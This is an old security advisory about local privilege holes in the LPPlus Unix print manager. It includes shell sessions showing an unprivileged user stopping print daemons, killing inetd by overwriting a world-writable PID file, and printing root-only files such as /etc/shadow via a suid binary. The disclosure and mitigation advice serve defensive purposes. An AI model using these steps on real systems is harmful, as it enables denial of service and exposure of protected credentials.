COMMAND
LPPlus
SYSTEMS AFFECTED
LPPlus 3.3.0, 3.2.1 (only tested)
PROBLEM
Dixie Flatline found following. LPPlus is Plus Technologies'
print management system for unix. It contains several serious
security holes, some of which undermine the integrity of the
printing subsystem, some of which threaten the security of the
system on which the product is installed.
Hole #1:
========
Of the 74 binaries that the installer put on Solaris system, 26
were installed suid to root and world-executable. On linux box,
it was 26 out of 64. Several of these should not be suid-root,
or should be group-executable only, and carefully restricted.
For example, the following binaries are installed mode 4755 by the
installer:
$LPHOME/bin/dccsched
$LPHOME/bin/dcclpdser
$LPHOME/bin/dccbkst
$LPHOME/bin/dccshut
$LPHOME/bin/dcclpdshut
$LPHOME/bin/dccbkstshut
The first three start the scheduler, LPD server and network status
daemons, respectively. The next three stop the aforementioned
services. In the default configuration, all six can be executed
by any unprivileged user, effectively giving any user on the
system the ability to start and stop printing services. No
checking of userid, group or anything else is done prior to
execution.
$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc
$
Hole #2:
========
$LPHOME/system/lpdprocess is created mode 777.
This file contains the process ID of the dcclpdser process. The
combination of this file's permissions and the fact that
dcclpdshut is executable by any user allows an unprivileged user
to send signal 2 (SIGINT) to any process on the system. All
that's required is for an unprivileged user to replace the PID in
$LPHOME/system/lpdprocess with the PID of their target process
and then run $LPHOME/bin/dcclpdshut.
$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$
Hole #3:
========
$LPHOME/bin/dccscan is suid-root and can be executed by any user.
It may allow an unprivileged user to print files to which he does
not have read access. The ramifications are fairly obvious:
although an unprivileged user cannot read /etc/shadow (for
example), using this utility, he may be able to print it out. In
testing, this worked even when sending to printers to which user
was not given any access in the LPPlus security configuration
(in fact, test user had no access to ANY printers, or ANY LPPlus
services).
# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$
# now, go to the printer and wait for the files to come out, or watch them
# being queued as root, if you have access to dccstat
Some other potential holes:
* if the archive module is installed, $LPHOME/bin/dccasweep can be
executed by any user. This may undermine the integrity of the
archiving facility.
* if the web interface is installed, it utilizes a very old beta
version of apache, and the installation requires that the server
(and all of its children, which run as nobody out-of-the-box)
run as root.
* on the linux system, $LPHOME was created mode 777. Root's umask
was set to 022. This didn't seem to be the case on the Solaris
system, although the reason for this may be the different
version of LPPLUS rather than the different unixes (see below
for version info).
SOLUTION
At this time, no patches or updated versions are available.
However, most of the utilities in question either don't need to
be suid, or can be group-owned by a more restricted group and
mode 4750.
The vendor was notified on 8/24/2000. They did respond,
confirming the existence of the holes. However, a request for an
ETA on an updated release or patches has thus far been ignored.